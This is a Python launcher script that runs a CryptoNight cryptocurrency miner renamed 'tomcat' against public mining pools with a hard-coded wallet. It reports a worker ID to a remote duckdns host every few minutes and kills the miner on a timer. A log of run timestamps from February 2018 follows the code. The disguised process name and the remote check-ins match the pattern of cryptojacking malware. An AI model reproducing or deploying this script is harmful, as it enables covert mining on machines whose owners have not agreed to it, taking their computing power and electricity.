import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:04.760912
#2018-02-17 17:17:05.083613
#2018-02-17 19:05:07.928019
#2018-02-17 20:52:07.051039
#2018-02-17 22:39:05.371801
#2018-02-18 00:23:06.140934
#2018-02-18 02:14:06.124645
#2018-02-18 04:01:06.256469
#2018-02-18 05:51:01.871023
#2018-02-18 07:42:03.999606
#2018-02-18 09:29:03.687641
#2018-02-18 11:16:03.644333
#2018-02-18 13:01:06.753246
#2018-02-18 14:49:06.845502
#2018-02-18 16:38:01.716767
#2018-02-18 18:27:04.884055
#2018-02-18 20:14:06.941656
#2018-02-18 22:00:04.623378
#2018-02-18 23:49:04.311695
#2018-02-19 01:35:06.959211
#2018-02-19 03:23:01.252719
#2018-02-19 05:08:01.958108
#2018-02-19 06:53:05.621095
#2018-02-19 08:43:01.894628
#2018-02-19 10:32:05.622036
#2018-02-19 12:20:01.702753
#2018-02-19 14:07:06.010616
#2018-02-19 15:56:07.695845
#2018-02-19 17:46:01.507949
#2018-02-19 19:32:05.204643
#2018-02-19 21:21:05.280293
#2018-02-19 23:07:06.213571
#2018-02-20 00:51:05.209150
#2018-02-20 02:40:09.703888
#2018-02-20 04:29:07.374693
#2018-02-20 06:13:08.145153
#2018-02-20 07:58:07.055298
#2018-02-20 09:44:06.382823
#2018-02-20 11:28:09.281090
#2018-02-20 13:15:04.282647
#2018-02-20 15:00:08.478868
#2018-02-20 16:44:06.848607
#2018-02-20 18:32:05.916879
#2018-02-20 20:23:02.060742
#2018-02-20 22:08:07.122693
#2018-02-20 23:50:09.369915
#2018-02-21 01:35:08.316633
#2018-02-21 03:22:06.761277
#2018-02-21 05:11:02.135765
#2018-02-21 06:58:03.722672
#2018-02-21 08:45:11.310466
#2018-02-21 10:31:06.680122
#2018-02-21 12:18:02.200075
#2018-02-21 14:07:08.627905
#2018-02-21 15:54:01.776052
#2018-02-21 17:46:08.080771
#2018-02-21 19:33:01.648509
#2018-02-21 21:20:01.865785
#2018-02-21 23:06:06.963266
#2018-02-22 00:54:02.097521
#2018-02-22 02:42:01.741805
#2018-02-22 04:29:01.460651
#2018-02-22 06:14:06.279214
#2018-02-22 07:59:01.873494
#2018-02-22 09:48:04.396516
#2018-02-22 11:32:09.807887
#2018-02-22 13:18:05.338273
#2018-02-22 15:06:09.526484
#2018-02-22 16:50:04.132643
#2018-02-22 18:37:08.272657
#2018-02-22 20:28:04.187653
#2018-02-22 22:15:04.725432
#2018-02-23 00:01:07.158269
#2018-02-23 01:47:08.092223
#2018-02-23 03:32:07.513986
#2018-02-23 05:16:08.726121
#2018-02-23 07:03:01.520759
#2018-02-23 08:51:07.928324
#2018-02-23 11:09:05.323796
#2018-02-23 13:02:08.538596
#2018-02-23 14:47:06.674288
#2018-02-23 16:35:10.823415
#2018-02-23 18:21:07.415402
#2018-02-23 20:05:09.358925
#2018-02-23 21:53:06.132941
#2018-02-23 23:43:01.619031
#2018-02-24 01:34:02.106772
#2018-02-24 03:22:06.707355
#2018-02-24 05:07:07.536071
#2018-02-24 06:56:01.320508
#2018-02-24 08:46:04.937921
#2018-02-24 10:47:07.108275
#2018-02-24 12:34:01.327797
#2018-02-24 14:22:05.599342
#2018-02-24 16:09:01.252856
#2018-02-24 18:00:08.112846
#2018-02-24 19:48:04.607464
#2018-02-24 21:33:06.584498
#2018-02-25 01:54:05.491511
#2018-02-25 05:06:05.393821
#2018-02-25 10:13:01.990311